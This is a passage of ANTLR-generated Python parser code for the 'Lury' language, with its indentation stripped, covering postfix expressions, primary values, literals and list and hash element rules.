if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << LuryParser.T__32) | (1 << LuryParser.T__33) | (1 << LuryParser.T__34) | (1 << LuryParser.T__40) | (1 << LuryParser.T__41))) != 0)):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
self.state = 253
localctx.unary = self.unary_expression()
pass
elif token in [LuryParser.T__42, LuryParser.T__44, LuryParser.T__45, LuryParser.T__46, LuryParser.T__47, LuryParser.T__49, LuryParser.NAME, LuryParser.STRING_LITERAL, LuryParser.DECIMAL_INTEGER, LuryParser.OCT_INTEGER, LuryParser.HEX_INTEGER, LuryParser.BIN_INTEGER, LuryParser.FLOAT_NUMBER]:
localctx = LuryParser.PostfixExpContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 254
self.postfix_expression(0)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Postfix_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_postfix_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class IndexerContext(Postfix_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Postfix_expressionContext
super().__init__(parser)
self.Key = None # Key_indexContext
self.copyFrom(ctx)
def postfix_expression(self):
return self.getTypedRuleContext(LuryParser.Postfix_expressionContext,0)
def key_index(self):
return self.getTypedRuleContext(LuryParser.Key_indexContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIndexer" ):
listener.enterIndexer(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIndexer" ):
listener.exitIndexer(self)
class PostDecrementContext(Postfix_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Postfix_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def postfix_expression(self):
return self.getTypedRuleContext(LuryParser.Postfix_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPostDecrement" ):
listener.enterPostDecrement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPostDecrement" ):
listener.exitPostDecrement(self)
class PostIncrementContext(Postfix_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Postfix_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def postfix_expression(self):
return self.getTypedRuleContext(LuryParser.Postfix_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPostIncrement" ):
listener.enterPostIncrement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPostIncrement" ):
listener.exitPostIncrement(self)
class PrimaryExpContext(Postfix_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Postfix_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def primary(self):
return self.getTypedRuleContext(LuryParser.PrimaryContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPrimaryExp" ):
listener.enterPrimaryExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPrimaryExp" ):
listener.exitPrimaryExp(self)
def postfix_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Postfix_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 40
self.enterRecursionRule(localctx, 40, self.RULE_postfix_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.PrimaryExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 258
self.primary()
self._ctx.stop = self._input.LT(-1)
self.state = 271
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,25,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 269
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,24,self._ctx)
if la_ == 1:
localctx = LuryParser.PostIncrementContext(self, LuryParser.Postfix_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_postfix_expression)
self.state = 260
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 261
self.match(LuryParser.T__40)
pass
elif la_ == 2:
localctx = LuryParser.PostDecrementContext(self, LuryParser.Postfix_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_postfix_expression)
self.state = 262
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 263
self.match(LuryParser.T__41)
pass
elif la_ == 3:
localctx = LuryParser.IndexerContext(self, LuryParser.Postfix_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_postfix_expression)
self.state = 264
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 265
self.match(LuryParser.T__42)
self.state = 266
localctx.Key = self.key_index()
self.state = 267
self.match(LuryParser.T__43)
pass
self.state = 273
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,25,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Key_indexContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def primary(self):
return self.getTypedRuleContext(LuryParser.PrimaryContext,0)
def getRuleIndex(self):
return LuryParser.RULE_key_index
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterKey_index" ):
listener.enterKey_index(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitKey_index" ):
listener.exitKey_index(self)
def key_index(self):
localctx = LuryParser.Key_indexContext(self, self._ctx, self.state)
self.enterRule(localctx, 42, self.RULE_key_index)
try:
self.enterOuterAlt(localctx, 1)
self.state = 274
self.primary()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class PrimaryContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_primary
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class NilContext(PrimaryContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.PrimaryContext
super().__init__(parser)
self.copyFrom(ctx)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNil" ):
listener.enterNil(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNil" ):
listener.exitNil(self)
class IdentifierContext(PrimaryContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.PrimaryContext
super().__init__(parser)
self.copyFrom(ctx)
def NAME(self):
return self.getToken(LuryParser.NAME, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIdentifier" ):
listener.enterIdentifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIdentifier" ):
listener.exitIdentifier(self)
class PrimaryLiteralContext(PrimaryContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.PrimaryContext
super().__init__(parser)
self.copyFrom(ctx)
def literal(self):
return self.getTypedRuleContext(LuryParser.LiteralContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPrimaryLiteral" ):
listener.enterPrimaryLiteral(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPrimaryLiteral" ):
listener.exitPrimaryLiteral(self)
class TrueContext(PrimaryContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.PrimaryContext
super().__init__(parser)
self.copyFrom(ctx)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTrue" ):
listener.enterTrue(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTrue" ):
listener.exitTrue(self)
class FalseContext(PrimaryContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.PrimaryContext
super().__init__(parser)
self.copyFrom(ctx)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFalse" ):
listener.enterFalse(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFalse" ):
listener.exitFalse(self)
class ParenthesesContext(PrimaryContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.PrimaryContext
super().__init__(parser)
self.exp = None # ExpressionContext
self.copyFrom(ctx)
def expression(self):
return self.getTypedRuleContext(LuryParser.ExpressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParentheses" ):
listener.enterParentheses(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParentheses" ):
listener.exitParentheses(self)
def primary(self):
localctx = LuryParser.PrimaryContext(self, self._ctx, self.state)
self.enterRule(localctx, 44, self.RULE_primary)
try:
self.state = 285
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [LuryParser.NAME]:
localctx = LuryParser.IdentifierContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 276
self.match(LuryParser.NAME)
pass
elif token in [LuryParser.T__42, LuryParser.T__49, LuryParser.STRING_LITERAL, LuryParser.DECIMAL_INTEGER, LuryParser.OCT_INTEGER, LuryParser.HEX_INTEGER, LuryParser.BIN_INTEGER, LuryParser.FLOAT_NUMBER]:
localctx = LuryParser.PrimaryLiteralContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 277
self.literal()
pass
elif token in [LuryParser.T__44]:
localctx = LuryParser.TrueContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 278
self.match(LuryParser.T__44)
pass
elif token in [LuryParser.T__45]:
localctx = LuryParser.FalseContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 279
self.match(LuryParser.T__45)
pass
elif token in [LuryParser.T__46]:
localctx = LuryParser.NilContext(self, localctx)
self.enterOuterAlt(localctx, 5)
self.state = 280
self.match(LuryParser.T__46)
pass
elif token in [LuryParser.T__47]:
localctx = LuryParser.ParenthesesContext(self, localctx)
self.enterOuterAlt(localctx, 6)
self.state = 281
self.match(LuryParser.T__47)
self.state = 282
localctx.exp = self.expression()
self.state = 283
self.match(LuryParser.T__48)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LiteralContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_literal
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class IntegerContext(LiteralContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.LiteralContext
super().__init__(parser)
self.copyFrom(ctx)
def DECIMAL_INTEGER(self):
return self.getToken(LuryParser.DECIMAL_INTEGER, 0)
def OCT_INTEGER(self):
return self.getToken(LuryParser.OCT_INTEGER, 0)
def HEX_INTEGER(self):
return self.getToken(LuryParser.HEX_INTEGER, 0)
def BIN_INTEGER(self):
return self.getToken(LuryParser.BIN_INTEGER, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInteger" ):
listener.enterInteger(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInteger" ):
listener.exitInteger(self)
class RealContext(LiteralContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.LiteralContext
super().__init__(parser)
self.copyFrom(ctx)
def FLOAT_NUMBER(self):
return self.getToken(LuryParser.FLOAT_NUMBER, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterReal" ):
listener.enterReal(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitReal" ):
listener.exitReal(self)
class ListContext(LiteralContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.LiteralContext
super().__init__(parser)
self.copyFrom(ctx)
def list_literal(self):
return self.getTypedRuleContext(LuryParser.List_literalContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterList" ):
listener.enterList(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitList" ):
listener.exitList(self)
class StringContext(LiteralContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.LiteralContext
super().__init__(parser)
self.copyFrom(ctx)
def STRING_LITERAL(self):
return self.getToken(LuryParser.STRING_LITERAL, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterString" ):
listener.enterString(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitString" ):
listener.exitString(self)
class HashContext(LiteralContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.LiteralContext
super().__init__(parser)
self.copyFrom(ctx)
def hash_literal(self):
return self.getTypedRuleContext(LuryParser.Hash_literalContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHash" ):
listener.enterHash(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHash" ):
listener.exitHash(self)
def literal(self):
localctx = LuryParser.LiteralContext(self, self._ctx, self.state)
self.enterRule(localctx, 46, self.RULE_literal)
self._la = 0 # Token type
try:
self.state = 292
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [LuryParser.STRING_LITERAL]:
localctx = LuryParser.StringContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 287
self.match(LuryParser.STRING_LITERAL)
pass
elif token in [LuryParser.FLOAT_NUMBER]:
localctx = LuryParser.RealContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 288
self.match(LuryParser.FLOAT_NUMBER)
pass
elif token in [LuryParser.DECIMAL_INTEGER, LuryParser.OCT_INTEGER, LuryParser.HEX_INTEGER, LuryParser.BIN_INTEGER]:
localctx = LuryParser.IntegerContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 289
_la = self._input.LA(1)
if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << LuryParser.DECIMAL_INTEGER) | (1 << LuryParser.OCT_INTEGER) | (1 << LuryParser.HEX_INTEGER) | (1 << LuryParser.BIN_INTEGER))) != 0)):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
pass
elif token in [LuryParser.T__42]:
localctx = LuryParser.ListContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 290
self.list_literal()
pass
elif token in [LuryParser.T__49]:
localctx = LuryParser.HashContext(self, localctx)
self.enterOuterAlt(localctx, 5)
self.state = 291
self.hash_literal()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class List_literalContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self.element = None # List_elementContext
def list_element(self):
return self.getTypedRuleContext(LuryParser.List_elementContext,0)
def getRuleIndex(self):
return LuryParser.RULE_list_literal
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterList_literal" ):
listener.enterList_literal(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitList_literal" ):
listener.exitList_literal(self)
def list_literal(self):
localctx = LuryParser.List_literalContext(self, self._ctx, self.state)
self.enterRule(localctx, 48, self.RULE_list_literal)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 294
self.match(LuryParser.T__42)
self.state = 296
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << LuryParser.T__16) | (1 << LuryParser.T__32) | (1 << LuryParser.T__33) | (1 << LuryParser.T__34) | (1 << LuryParser.T__40) | (1 << LuryParser.T__41) | (1 << LuryParser.T__42) | (1 << LuryParser.T__44) | (1 << LuryParser.T__45) | (1 << LuryParser.T__46) | (1 << LuryParser.T__47) | (1 << LuryParser.T__49) | (1 << LuryParser.NAME) | (1 << LuryParser.STRING_LITERAL) | (1 << LuryParser.DECIMAL_INTEGER) | (1 << LuryParser.OCT_INTEGER) | (1 << LuryParser.HEX_INTEGER) | (1 << LuryParser.BIN_INTEGER) | (1 << LuryParser.FLOAT_NUMBER))) != 0):
self.state = 295
localctx.element = self.list_element(0)
self.state = 298
self.match(LuryParser.T__43)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class List_elementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_list_element
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class ListElementsContext(List_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.List_elementContext
super().__init__(parser)
self.copyFrom(ctx)
def list_element(self):
return self.getTypedRuleContext(LuryParser.List_elementContext,0)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterListElements" ):
listener.enterListElements(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitListElements" ):
listener.exitListElements(self)
class ListElementContext(List_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.List_elementContext
super().__init__(parser)
self.copyFrom(ctx)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterListElement" ):
listener.enterListElement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitListElement" ):
listener.exitListElement(self)
def list_element(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.List_elementContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 50
self.enterRecursionRule(localctx, 50, self.RULE_list_element, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.ListElementContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 301
self.bool_not_expression()
self.state = 303
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,29,self._ctx)
if la_ == 1:
self.state = 302
self.match(LuryParser.T__15)
self._ctx.stop = self._input.LT(-1)
self.state = 313
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,31,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = LuryParser.ListElementsContext(self, LuryParser.List_elementContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_list_element)
self.state = 305
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 306
self.match(LuryParser.T__15)
self.state = 307
self.bool_not_expression()
self.state = 309
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,30,self._ctx)
if la_ == 1:
self.state = 308
self.match(LuryParser.T__15)
self.state = 315
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,31,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Hash_literalContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self.element = None # Hash_elementContext
def hash_element(self):
return self.getTypedRuleContext(LuryParser.Hash_elementContext,0)
def getRuleIndex(self):
return LuryParser.RULE_hash_literal
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHash_literal" ):
listener.enterHash_literal(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHash_literal" ):
listener.exitHash_literal(self)
def hash_literal(self):
localctx = LuryParser.Hash_literalContext(self, self._ctx, self.state)
self.enterRule(localctx, 52, self.RULE_hash_literal)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 316
self.match(LuryParser.T__49)
self.state = 318
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << LuryParser.T__42) | (1 << LuryParser.T__44) | (1 << LuryParser.T__45) | (1 << LuryParser.T__46) | (1 << LuryParser.T__47) | (1 << LuryParser.T__49) | (1 << LuryParser.NAME) | (1 << LuryParser.STRING_LITERAL) | (1 << LuryParser.DECIMAL_INTEGER) | (1 << LuryParser.OCT_INTEGER) | (1 << LuryParser.HEX_INTEGER) | (1 << LuryParser.BIN_INTEGER) | (1 << LuryParser.FLOAT_NUMBER))) != 0):
self.state = 317
localctx.element = self.hash_element(0)
self.state = 320
self.match(LuryParser.T__50)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Hash_elementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_hash_element
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class HashElementNameContext(Hash_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Hash_elementContext
super().__init__(parser)
self.copyFrom(ctx)
def NAME(self):
return self.getToken(LuryParser.NAME, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHashElementName" ):
listener.enterHashElementName(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHashElementName" ):
listener.exitHashElementName(self)
class HashElementsContext(Hash_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Hash_elementContext
super().__init__(parser)
self.nest = None # Hash_elementContext
self.key = None # PrimaryContext
self.value = None # Bool_not_expressionContext
self.copyFrom(ctx)
def hash_element(self):
return self.getTypedRuleContext(LuryParser.Hash_elementContext,0)
def primary(self):
return self.getTypedRuleContext(LuryParser.PrimaryContext,0)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHashElements" ):
listener.enterHashElements(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHashElements" ):
listener.exitHashElements(self)
class HashElementContext(Hash_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Hash_elementContext
super().__init__(parser)
self.key = None # PrimaryContext
self.value = None # Bool_not_expressionContext
self.copyFrom(ctx)
def primary(self):
return self.getTypedRuleContext(LuryParser.PrimaryContext,0)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHashElement" ):
listener.enterHashElement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHashElement" ):
listener.exitHashElement(self)
class HashElementsVariableContext(Hash_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Hash_elementContext
super().__init__(parser)
self.nest = None # Hash_elementContext
self.key = None # PrimaryContext
self.value = None # Bool_not_expressionContext
self.copyFrom(ctx)
def hash_element(self):
return self.getTypedRuleContext(LuryParser.Hash_elementContext,0)
def primary(self):
return self.getTypedRuleContext(LuryParser.PrimaryContext,0)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHashElementsVariable" ):
listener.enterHashElementsVariable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHashElementsVariable" ):
listener.exitHashElementsVariable(self)
class HashElementVariableContext(Hash_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Hash_elementContext
super().__init__(parser)
self.key = None # PrimaryContext
self.value = None # Bool_not_expressionContext
self.copyFrom(ctx)
def primary(self):
return self.getTypedRuleContext(LuryParser.PrimaryContext,0)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHashElementVariable" ):
listener.enterHashElementVariable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHashElementVariable" ):
listener.exitHashElementVariable(self)
class HashElementsNameContext(Hash_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Hash_elementContext
super().__init__(parser)
self.nest = None # Hash_elementContext
self.copyFrom(ctx)
def NAME(self):
return self.getToken(LuryParser.NAME, 0)
def hash_element(self):
return self.getTypedRuleContext(LuryParser.Hash_elementContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHashElementsName" ):
listener.enterHashElementsName(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHashElementsName" ):
listener.exitHashElementsName(self)
def hash_element(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Hash_elementContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 54
self.enterRecursionRule(localctx, 54, self.RULE_hash_element, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 341
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,36,self._ctx)
if la_ == 1:
localctx = LuryParser.HashElementContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 323
localctx.key = self.primary()
self.state = 324
self.match(LuryParser.T__51)
self.state = 325
localctx.value = self.bool_not_expression()
self.state = 327
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,33,self._ctx)
if la_ == 1:
self.state = 326
self.match(LuryParser.T__15)
pass
elif la_ == 2:
localctx = LuryParser.HashElementVariableContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 329
self.match(LuryParser.T__42)
self.state = 330
localctx.key = self.primary()
self.state = 331
self.match(LuryParser.T__43)
self.state = 332
self.match(LuryParser.T__51)
self.state = 333
localctx.value = self.bool_not_expression()
self.state = 335
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,34,self._ctx)
if la_ == 1:
self.state = 334
self.match(LuryParser.T__15)
pass
elif la_ == 3:
localctx = LuryParser.HashElementNameContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 337
self.match(LuryParser.NAME)
self.state = 339
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,35,self._ctx)
if la_ == 1:
self.state = 338
self.match(LuryParser.T__15)
pass
self._ctx.stop = self._input.LT(-1)
self.state = 369
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,41,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 367
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,40,self._ctx)
if la_ == 1:
localctx = LuryParser.HashElementsContext(self, LuryParser.Hash_elementContext(self, _parentctx, _parentState))
localctx.nest = _prevctx
self.pushNewRecursionContext(localctx, _startState, self.RULE_hash_element)
self.state = 343
if not self.precpred(self._ctx, 6):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 6)")
self.state = 344
self.match(LuryParser.T__15)
self.state = 345
localctx.key = self.primary()
self.state = 346
self.match(LuryParser.T__51)
self.state = 347
localctx.value = self.bool_not_expression()
self.state = 349
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,37,self._ctx)
if la_ == 1:
self.state = 348
self.match(LuryParser.T__15)
pass
elif la_ == 2:
localctx = LuryParser.HashElementsVariableContext(self, LuryParser.Hash_elementContext(self, _parentctx, _parentState))
localctx.nest = _prevctx
self.pushNewRecursionContext(localctx, _startState, self.RULE_hash_element)
self.state = 351
if not self.precpred(self._ctx, 5):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 5)")
self.state = 352
self.match(LuryParser.T__15)
self.state = 353
self.match(LuryParser.T__42)
self.state = 354
localctx.key = self.primary()
self.state = 355
self.match(LuryParser.T__43)
self.state = 356
self.match(LuryParser.T__51)
self.state = 357
localctx.value = self.bool_not_expression()
self.state = 359
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,38,self._ctx)
if la_ == 1:
self.state = 358
self.match(LuryParser.T__15)
pass
elif la_ == 3:
localctx = LuryParser.HashElementsNameContext(self, LuryParser.Hash_elementContext(self, _parentctx, _parentState))
localctx.nest = _prevctx
self.pushNewRecursionContext(localctx, _startState, self.RULE_hash_element)
self.state = 361
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 362
self.match(LuryParser.T__15)
self.state = 363
self.match(LuryParser.NAME)
self.state = 365
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,39,self._ctx)
if la_ == 1:
self.state = 364
self.match(LuryParser.T__15)
pass
self.state = 371
